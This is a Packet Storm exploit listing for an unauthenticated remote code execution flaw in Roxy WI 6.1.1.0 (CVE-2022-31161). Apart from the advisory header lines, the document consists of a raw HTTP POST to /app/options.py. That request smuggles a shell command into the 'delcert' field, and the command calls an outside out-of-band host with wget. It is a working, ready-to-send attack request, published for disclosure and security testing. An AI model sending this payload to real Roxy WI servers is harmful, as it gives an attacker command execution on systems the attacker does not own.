Lucene search

K
packetstormNuri CilengirPACKETSTORM:171652
HistoryApr 03, 2023 - 12:00 a.m.

Roxy WI 6.1.1.0 Remote Code Execution

2023-04-0300:00:00
Nuri Cilengir
packetstormsecurity.com
152
roxy wi
remote code execution
rce
ssl_cert
ubuntu 22.04
cve-2022-31161
nuri Γ§ilengir
pentest blog

0.949 High

EPSS

Percentile

99.3%

`# ADVISORY INFORMATION  
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload  
# Date of found: 21 July 2022  
# Application: Roxy WI <= v6.1.1.0  
# Author: Nuri Γ‡ilengir   
# Vendor Homepage: https://roxy-wi.org  
# Software Link: https://github.com/hap-wi/roxy-wi.git  
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137  
# Tested on: Ubuntu 22.04  
# CVE : CVE-2022-31161  
  
  
# PoC  
POST /app/options.py HTTP/1.1  
Host: 192.168.56.116  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 123  
Origin: https://192.168.56.116  
Referer: https://192.168.56.116/app/login.py  
Connection: close  
  
show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;  
  
`